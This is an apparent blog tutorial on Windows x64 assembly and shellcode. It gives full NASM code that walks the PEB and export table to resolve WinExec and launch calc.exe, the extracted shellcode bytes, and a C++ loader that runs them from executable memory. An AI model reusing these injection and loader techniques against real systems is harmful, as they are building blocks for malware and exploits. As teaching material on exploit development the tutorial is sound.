x64 Assembly & Shellcoding 101

November 1, 2024 16 minute read

I have admittedly scoured the internet looking for examples of basic x64 shellcode development and have not had much luck. So many tutorials and lessons seem to still focus on x86 assembly, even many modern shellcode courses stick with x86. Don’t get me wrong, x86 is great and not as steep a learning curve. But most payloads in your offsec adventure will be x64 architecture, and it makes a difference! My hope is to provide a step by step set of lessons to help you, the reader, have the resources and knowledge necessary to properly learn x64 assembly/shellcode development without too much headache along the way. Well then, let’s hop to it shall we?

Disclaimer - I’m no guru when it comes to x64 assembly. But I know enough to understand how to at least guide those interested into learning the basics and produce working shellcode ready to use in exploit development, reverse engineering concepts, and pentest engagements.

Finally, NASM (The Netwide Assembler) assembly syntax will be used as the syntax of choice for our x64 assembly coding needs. Let’s begin! 🐱

Part 1 - x64 Essentials: Registers

Okay, let’s go ahead and get the boring yet vital information out of the way first. In x64 assembly, you have to types of register values:

Volatile: Applies to registers RAX, RCX, RDX, R8, R9, R10, R11
Non-Volatile: RBX, RBP, RDI, RSI, R12, R13, R14, R15, RSP

Volatile registers are as the name suggests, will change values based on function calls, etc.

Non-Volatile registers do not change value after function calls and can be used reliably to store values you will need throughout your code.

Registers RCX, RDX, R8 and R9 are used as parameters, and in that exact order. For instance, when you execute ExitProcess and pass the first parameter 0 to your function call, you use the register RCX, like so:

; --- GetProcess ---
mov r15, rax ;address for GetProcess previously acquired
mov rcx, 0   ;move '0' into the first and only expected parameter
call r15     ;Execute GetProcess!!!

How about more than one parameter? Well, that would use RCX as the 1st parameter, and RDX as the second. If you had a 3rd and 4th parameter value, you would then use r8, and r9 respectively. Here’s the x64 assembly code for WinExec, passing the application string into RCX and the value ‘1’ into RDX. 1 equates to ‘Display Window’ if the application has a window/GUI to be displayed.

; --- WinExec ---
pop r15                         ;address for WinExec previously acquired
mov rax, 0x00                   ;NULL byte
push rax                        ;push to stack
mov rax, 0x6578652E636C6163     ;calc.exe 
push rax                        ;push to stack
mov rcx, rsp	                  ; RCX, our first parameter, now points to the string of the application we wish to execute: "calc.exe"
mov rdx, 1                      ; move 1 into RDX as the 2nd parameter to display the application's GUI/window
sub rsp, 0x30                   ; I'll explain this in greater detail later.  It involves shadow space/16 byte stack alignment
call r15                        ; Execute WinExec!!!

How about all 4 parameters? We can use MessageBoxA to demonstrate that:

mov r15, rax                   ; MessageBoxA address previously acquired
mov rcx, 0                     ; 1st Parameter - hWnd = NULL (no owner window)
mov rax, 0x006D                ; move the final letter, m, into RAX and null terminate with a '0'
push rax                       ; push 'm' and 0 to the stack, pointed to by RAX
mov rax, 0x3374737973743367    ; move the first 8 characters of the string 'g3tsyst3' into RAX.  
push rax                       ; push 'g3tsyst3' string to the stack, pointed to by RAX
mov rdx, rsp                   ; 2nd Parameter - lpText = pointer to message
    
mov r8, rsp                    ; 3rd Parameter - lpCaption = pointer to title
mov r9d, 0                     ; 4th Parameter - uType = MB_OK (OK button only)

sub rsp, 0x30                  ;I'll explain this in greater detail later.  It involves shadow space/16 byte stack alignment
call r15                       ; Call MessageBoxA

Notice how I use register R15 to store the address value for the API. I chose this register because like its other counterparts R14, R13, and R12 it is non-volatile meaning it won’t be altered after a function call. These non-volatile registers are essential when you need to preserve a value that hasn’t been pushed to the stack. Here’s an example of the Register values before and after a functional call. Notice how all the volatile registers values change as expected, but R15 remains as-is.

Before the CALL:

After the CALL:

Okay! So that’s the general breakdown on x64 Registers. Moving on!

Part 1 - x64 Essentials: Stack Alignment

We’re almost finished with the dry material I promise. The fun stuff is just around the corner. 😺 Okay moving on. Let’s discuss the 16 byte stack alignment convention. If that sounds like a foreign language to you don’t fret, it’s fairly straight forward albeit somewhat tedius to implement. I’ll break it down as simply as I can.

The stack operates in 16 byte boundaries in x64 assembly. Before you make a function call, the stack needs to be aligned according to this principle.

Simply put, RSP needs to be divisible by 16 before a function call.

Instead of focusing solely on the specific value of RSP for 16-byte alignment, you can view the requirement as needing the stack pointer (RSP) to be at any address that is a multiple of 16 (i.e., 0x10, 0x20, 0x30, etc.). This means any value of RSP that results in RSP % 16 == 0 is considered aligned.

Examples of Divisibility:

PUSH and CALL are examples of instructions that cause the stack pointer to decrement by 8 bytes. POP increments the stack pointer by 8. This will alter the stack alignment. For example:

Before the POP instruction our value in the 10s digit of RSP is 0x88, or 136 in decimal. This is NOT divisible by 16 (136/16 = 8.5). However…

After the POP command, which remember increases RSP by 8 bytes, we’re back to the stack being divisible by 16.

Now, RSP’s 10’s digit holds the hex value of 0x90 which is 144 in decimal and divisible by 16 (144/16 = 9)! It’s very mathemetical in nature when you think about it. Love it or hate it, this is part of x64 assembly but it’s not as painful as it may seem. It’s best that the stack remain aligned during the entirety of your code but it’s most important before a function call. If the stack isn’t properly aligned, your code will likely jump to an unintended location in memory and fail.

Part 1 - x64 Essentials: Shadow Space

Okay, hope you’re still with me and everything is making sense so far. If something still isn’t quite sinking in, hit me up on X with PM. Happy to help field any and all questions. Alright, I promise we’re almost to the end of the x64 Essentials portion of this writeup! 🐶 Let’s talk about Shadow Space aka home space / aka spill space now.

In the Windows x64 calling convention, the caller is required to reserve 32 bytes (4 slots of 8 bytes) as shadow space for the callee, even if the function doesn’t need it. This space is reserved but isn’t automatically adjusted unless explicitly handled with an instruction like sub rsp, 0x20 or more.

Functions frequently need additional stack space for local variables and further alignment. You might see sub rsp, 0x30 or even larger adjustments like sub rsp, 0x40 to allocate both shadow space and additional space before the function call. I do this often in my own code. Once again, this helps ensure adequate space is available when the function needs to place expected values as well as potential unexpected values on the stack AND helps ensure RSP remains 16-byte aligned. Here’s a visual to help make more sense of this.

First, I’ll comment out the shadow space allocation before the function call and see what happens:

Then compile it (I like using ld.exe to compile my x64 assembly code):

RCX has the kernel32 base address, RDX holds a pointer to our LoadLibraryA string, and R15 holds the address to GetProcAddress:

If we totally neglect setting any shadow space before the function call, it seems our return value that normally gets placed into RAX did not work out. if RAX is 0 after a function call, it’s usually not a good thing. Our parameters and other data that got placed on the stack likely got clobbered without having reserve space normally available to the function that we are expected to supply. Check it out:

BEFORE:

AFTER:

Alright, so this proves how things can go badly without setting up the proper shadow space reserves. Let’s do that now and see if things play out better for us: 😸

Now we will add in the shadow space, recompile and disassemble the program to at the same location and see what happens:

BINGO! There it is, our LoadLibraryA API address as we hoped for. Right there waiting expectantly for us in the RAX register. You’ll also see our shadow space stack adjustment too:

I could go on and on about ways to mitigate potential shadow space issues. But this will give you a good idea what to expect, and how to prepare for function calls using x64 16 byte stack alignment and shadow space requirements. If you’d like more information on this topic, as always hit me up on X and I can talk about this in greater detail. Now that we have a good overview on registers and stack alignment requiremets for x64 assembly, let’s dive in to our next section for this writeup.

Part 2 - x64 First Program: Dynamically locate WinExec and execute calc.exe

Finally! We’re on to something exciting after all the necessary boring stuff is out of the way. (admittedly I like the boring stuff, but it is a bit dry…I get it) 😄

Okay, I’m going to go off the assumption that you have familiarized yourself with some of the conventional x64 instructions. If not no worries! I’ll include comments to help explain the most common instructions you should be familar with and help you understand how they work. Also, I’m going off the additional assumption you know what the basic template is for locating kernel32 base address and walking the PE (Portable Executable) file’s Export Table to find ordinals for function/API names. I’d recommend familiarizing yourself with the PE export table when you get the chance, but you can just build off of my template for now.

Let’s start by locating kernel32 base address. This is actually very simple!

;nasm -fwin64 [x64findkernel32.asm]
;ld -m i386pep -o x64findkernel32.exe x64findkernel32.obj

BITS 64
SECTION .text
global main
main:

sub rsp, 0x28
and rsp, 0xFFFFFFFFFFFFFFF0
xor rcx, rcx             ;RCX = 0
mov rax, [gs:rcx + 0x60] ;RAX = PEB
mov rax, [rax + 0x18]    ;RAX = PEB / Ldr
mov rsi,[rax+0x10]       ;PEB_Ldr / InLoadOrderModuleList
mov rsi, [rsi]           ;could substitute lodsq here instead if you like
mov rsi,[rsi]            ;also could substitute lodsq here too
mov rbx, [rsi+0x30]      ;kernel32.dll base address
mov r8, rbx              ;mov kernel32.dll base addr into register of your choosing

Okay, kernel32 base address is now in r8. r8 is a volatile register so be sure to move the value held by this register to another register if you need to use this register more than once as it will almost definitely be overwritten after your first function call takes place. Let’s test it out and see if we get kernel32 base address. Sure enough, there it is in RBX and also in R8 where we copied it:

Now that we have our kernel32 base address, let’s go ahead and get our total function count and RVA/VMA info:

;Code for parsing Export Address Table
mov ebx, [rbx+0x3C]           ; Get Kernel32 PE Signature (0x3C) into EBX
add rbx, r8                   ; signature offset
mov edx, [rbx+0x88]           ; PE32 Signature / Export Address Table
add rdx, r8                   ; kernel32.dll + RVA ExportTable = ExportTable Address
mov r10d, [rdx+0x14]          ; Total count for number of functions
xor r11, r11                  ; clear R11 
mov r11d, [rdx+0x20]          ; AddressOfNames = RVA
add r11, r8                   ; AddressOfNames = VMA

Next, let’s plug in the function name we want to look for and setup our function counter:

mov rcx, r10                  ; Setup loop counter

mov rax, 0x00636578456E6957   ;"WinExec" string NULL terminated with a '0' 
push rax                      ;push to the stack
mov rax, rsp	                ;move stack pointer to our WinExec string into RAX
add rsp, 8                    ;keep with 16 byte stack alignment
jmp kernel32findfunction

Now, let’s find the function in question:

; Loop over Export Address Table to find WinApi names
kernel32findfunction: 
    jecxz FunctionNameNotFound    ; If ecx is zero (function not found), set breakpoint
    xor ebx,ebx                   ; Zero EBX
    mov ebx, [r11+rcx*4]          ; EBX = RVA for first AddressOfName
    add rbx, r8                   ; RBX = Function name VMA / add kernel32 base address to RVA to get WinApi name
    dec rcx                       ; Decrement our loop by one, this goes from Z to A
   
    mov r9, qword [rax]                ; R9 = "WinExec"
    cmp [rbx], r9                      ; Compare all bytes
    jz FunctionNameFound               ; jump if zero flag is set (found function name!)
	jnz kernel32findfunction             ; didn't find the name, so keep loopin til we do!

FunctionNameFound:
push rcx                               ; found it, so save it for later
jmp OrdinalLookupSetup

FunctionNameNotFound:
int3

And now the final stretch of code:

OrdinalLookupSetup:  ;We found our target WinApi position in the functions lookup
   pop r15         ;getprocaddress position
   js OrdinalLookup
   
OrdinalLookup:   
   mov rcx, r15                  ; move our function's place into RCX
   xor r11, r11                  ; clear R11 for use
   mov r11d, [rdx+0x24]          ; AddressOfNameOrdinals = RVA
   add r11, r8                   ; AddressOfNameOrdinals = VMA
   ; Get the function ordinal from AddressOfNameOrdinals
   inc rcx
   mov r13w, [r11+rcx*2]         ; AddressOfNameOrdinals + Counter. RCX = counter
   ;With the function ordinal value, we can finally lookup the WinExec address from AddressOfFunctions.

   xor r11, r11
   mov r11d, [rdx+0x1c]          ; AddressOfFunctions = RVA
   add r11, r8                   ; AddressOfFunctions VMA in R11. Kernel32+RVA for function addresses
   mov eax, [r11+r13*4]          ; function RVA.
   add rax, r8                   ; Found the WinExec Api address!!!
   push rax                      ; Store function addresses by pushing it temporarily
   js executeit

Let’s see if our WinExec API address is now in RAX:

Sure enough, there is is!

Now let’s use our newfound WinExec address to execute calc.exe!

executeit:
; --- prepare to call WinExec ---
pop r15                         ;address for WinExec
mov rax, 0x00                   ;push null string terminator '0'
push rax                        ;push it onto the stack
mov rax, 0x6578652E636C6163     ; move string 'calc.exe' into RAX 
push rax                        ; push string + null terminator to stack
mov rcx, rsp	                  ; RDX points to stack pointer "WinExec" (1st parameter))
mov rdx, 1                      ; move 1 (show window parameter) into RDX (2nd parameter)
sub rsp, 0x30                   ; align stack 16 bytes and allow for proper setup for shadow space demands
call r15                        ; Call WinExec!!

I don’t need to take a pic of calc. just trust me, it loaded 😸 HOWEVER!!! This compiled program does not exit gracefully because we do not load ExitProcess. That can be your homework. Try and find a way to use the information gleaned in this writeup to also locate ExitProcess (it’s also in kernel32.dll) and exit this program cleanly. Okay, onto our last segment…

Part 3 - Convert to x64 Shellcode: execute your custom shellcode

First off, go ahead and compile it:

nasm.exe -f win64 winexec.asm -o winexec.o

That will produce an .obj file. Now, just do the following:

objdump -d winexec.o

You should get your shellcode output along with your assembly instructions. Here’s what mine looks like.

Disassembly of section .text:

0000000000000000 <main>:
   0:   48 83 ec 28             sub    $0x28,%rsp
   4:   48 83 e4 f0             and    $0xfffffffffffffff0,%rsp
   8:   48 31 c9                xor    %rcx,%rcx
   b:   65 48 8b 41 60          mov    %gs:0x60(%rcx),%rax
  10:   48 8b 40 18             mov    0x18(%rax),%rax
  14:   48 8b 70 10             mov    0x10(%rax),%rsi
  18:   48 8b 36                mov    (%rsi),%rsi
  1b:   48 8b 36                mov    (%rsi),%rsi
  1e:   48 8b 5e 30             mov    0x30(%rsi),%rbx
  22:   49 89 d8                mov    %rbx,%r8
  25:   8b 5b 3c                mov    0x3c(%rbx),%ebx
  28:   4c 01 c3                add    %r8,%rbx
  2b:   8b 93 88 00 00 00       mov    0x88(%rbx),%edx
  31:   4c 01 c2                add    %r8,%rdx
  34:   44 8b 52 14             mov    0x14(%rdx),%r10d
  38:   4d 31 db                xor    %r11,%r11
  3b:   44 8b 5a 20             mov    0x20(%rdx),%r11d
  3f:   4d 01 c3                add    %r8,%r11
  42:   4c 89 d1                mov    %r10,%rcx
  45:   48 b8 57 69 6e 45 78    movabs $0x636578456e6957,%rax
  4c:   65 63 00
  4f:   50                      push   %rax
  50:   48 89 e0                mov    %rsp,%rax
  53:   48 83 c4 08             add    $0x8,%rsp
  57:   eb 00                   jmp    59 <kernel32findfunction>

0000000000000059 <kernel32findfunction>:
  59:   67 e3 19                jecxz  75 <FunctionNameNotFound>
  5c:   31 db                   xor    %ebx,%ebx
  5e:   41 8b 1c 8b             mov    (%r11,%rcx,4),%ebx
  62:   4c 01 c3                add    %r8,%rbx
  65:   48 ff c9                dec    %rcx
  68:   4c 8b 08                mov    (%rax),%r9
  6b:   4c 39 0b                cmp    %r9,(%rbx)
  6e:   74 02                   je     72 <FunctionNameFound>
  70:   75 e7                   jne    59 <kernel32findfunction>

0000000000000072 <FunctionNameFound>:
  72:   51                      push   %rcx
  73:   eb 01                   jmp    76 <OrdinalLookupSetup>

0000000000000075 <FunctionNameNotFound>:
  75:   cc                      int3

0000000000000076 <OrdinalLookupSetup>:
  76:   41 5f                   pop    %r15
  78:   78 00                   js     7a <OrdinalLookup>

000000000000007a <OrdinalLookup>:
  7a:   4c 89 f9                mov    %r15,%rcx
  7d:   4d 31 db                xor    %r11,%r11
  80:   44 8b 5a 24             mov    0x24(%rdx),%r11d
  84:   4d 01 c3                add    %r8,%r11
  87:   48 ff c1                inc    %rcx
  8a:   66 45 8b 2c 4b          mov    (%r11,%rcx,2),%r13w
  8f:   4d 31 db                xor    %r11,%r11
  92:   44 8b 5a 1c             mov    0x1c(%rdx),%r11d
  96:   4d 01 c3                add    %r8,%r11
  99:   43 8b 04 ab             mov    (%r11,%r13,4),%eax
  9d:   4c 01 c0                add    %r8,%rax
  a0:   50                      push   %rax
  a1:   78 00                   js     a3 <executeit>

00000000000000a3 <executeit>:
  a3:   41 5f                   pop    %r15
  a5:   b8 00 00 00 00          mov    $0x0,%eax
  aa:   50                      push   %rax
  ab:   48 b8 63 61 6c 63 2e    movabs $0x6578652e636c6163,%rax
  b2:   65 78 65
  b5:   50                      push   %rax
  b6:   48 89 e1                mov    %rsp,%rcx
  b9:   ba 01 00 00 00          mov    $0x1,%edx
  be:   48 83 ec 30             sub    $0x30,%rsp
  c2:   41 ff d7                call   *%r15

Now let’s extract the shellcode:

for i in $(objdump -D winexec.o | grep “^ “ | cut -f2); do echo -n “\x$i” ; done

here’s what it looks like with just the machine code extracted:

“\x48\x83\xec\x28\x48\x83\xe4\xf0\x48\x31\xc9\x65\x48\x8b\x41\x60\x48\x8b” “\x40\x18\x48\x8b\x70\x10\x48\x8b\x36\x48\x8b\x36\x48\x8b\x5e\x30\x49\x89” “\xd8\x8b\x5b\x3c\x4c\x01\xc3\x8b\x93\x88\x00\x00\x00\x4c\x01\xc2\x44\x8b” “\x52\x14\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4c\x89\xd1\x48\xb8\x57” “\x69\x6e\x45\x78\x65\x63\x00\x50\x48\x89\xe0\x48\x83\xc4\x08\xeb\x00\x67” “\xe3\x19\x31\xdb\x41\x8b\x1c\x8b\x4c\x01\xc3\x48\xff\xc9\x4c\x8b\x08\x4c” “\x39\x0b\x74\x02\x75\xe7\x51\xeb\x01\xcc\x41\x5f\x78\x00\x4c\x89\xf9\x4d” “\x31\xdb\x44\x8b\x5a\x24\x4d\x01\xc3\x48\xff\xc1\x66\x45\x8b\x2c\x4b\x4d” “\x31\xdb\x44\x8b\x5a\x1c\x4d\x01\xc3\x43\x8b\x04\xab\x4c\x01\xc0\x50\x78” “\x00\x41\x5f\xb8\x00\x00\x00\x00\x50\x48\xb8\x63\x61\x6c\x63\x2e\x65\x78” “\x65\x50\x48\x89\xe1\xba\x01\x00\x00\x00\x48\x83\xec\x30\x41\xff\xd7”;

Now, the final piece to all of this. Let’s add the x64 shellcode to a custom C++ program and execute it!

#include <windows.h>
#include <iostream>

unsigned char shellcode[] =
"\x48\x83\xec\x28\x48\x83\xe4\xf0\x48\x31\xc9\x65\x48\x8b\x41\x60"
"\x48\x8b\x40\x18\x48\x8b\x70\x10\x48\x8b\x36\x48\x8b\x36\x48\x8b"
"\x5e\x30\x49\x89\xd8\x8b\x5b\x3c\x4c\x01\xc3\x8b\x93\x88\x00\x00"
"\x00\x4c\x01\xc2\x44\x8b\x52\x14\x4d\x31\xdb\x44\x8b\x5a\x20\x4d"
"\x01\xc3\x4c\x89\xd1\x48\xb8\x57\x69\x6e\x45\x78\x65\x63\x00\x50"
"\x48\x89\xe0\x48\x83\xc4\x08\xeb\x00\x67\xe3\x19\x31\xdb\x41\x8b"
"\x1c\x8b\x4c\x01\xc3\x48\xff\xc9\x4c\x8b\x08\x4c\x39\x0b\x74\x02"
"\x75\xe7\x51\xeb\x01\xcc\x41\x5f\x78\x00\x4c\x89\xf9\x4d\x31\xdb"
"\x44\x8b\x5a\x24\x4d\x01\xc3\x48\xff\xc1\x66\x45\x8b\x2c\x4b\x4d"
"\x31\xdb\x44\x8b\x5a\x1c\x4d\x01\xc3\x43\x8b\x04\xab\x4c\x01\xc0"
"\x50\x78\x00\x41\x5f\xb8\x00\x00\x00\x00\x50\x48\xb8\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x50\x48\x89\xe1\xba\x01\x00\x00\x00\x48\x83"
"\xec\x30\x41\xff\xd7";

int main() {
    
    void* exec_mem = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if (exec_mem == nullptr) {
        std::cerr << "Memory allocation failed\n";
        return -1;
    }
    memcpy(exec_mem, shellcode, sizeof(shellcode));
    auto shellcode_func = reinterpret_cast<void(*)()>(exec_mem);
    shellcode_func();
    VirtualFree(exec_mem, 0, MEM_RELEASE);
    return 0;
}

Believe it or not, we’re just warming up! I hope you’re as excited as I am, because the next section will cover removing NULL bytes so we can use this shellcode in buffer overflow exploits! 😸 I also hope this has been informative and somewhat easy to follow. It takes me a while to piece together all the info and I wish I had more time to go even further into detail on each aspect of x64 assembly / shellcoding, but this is all the time I can commit to this portion of our walkthrough for now. Thank you everyone! The next time we will focus on removing NULL bytes ’00s’ and learn how to dynamically locate functions using ‘GetProcAddress’ and pop a MessageBox. See ya then!

Share on

Twitter Facebook LinkedIn

R.B.C (g3tsyst3m)

x64 Assembly & Shellcoding 101

Part 1 - x64 Essentials: Registers

Part 1 - x64 Essentials: Stack Alignment

Part 1 - x64 Essentials: Shadow Space

Part 2 - x64 First Program: Dynamically locate WinExec and execute calc.exe

Part 3 - Convert to x64 Shellcode: execute your custom shellcode

Share on

Leave a comment

You may also enjoy

Create your own C2 using Python- Part 3

Create your own C2 using Python- Part 2

Create your own C2 using Python- Part 1

x64 Assembly & Shellcoding 101 - Conclusion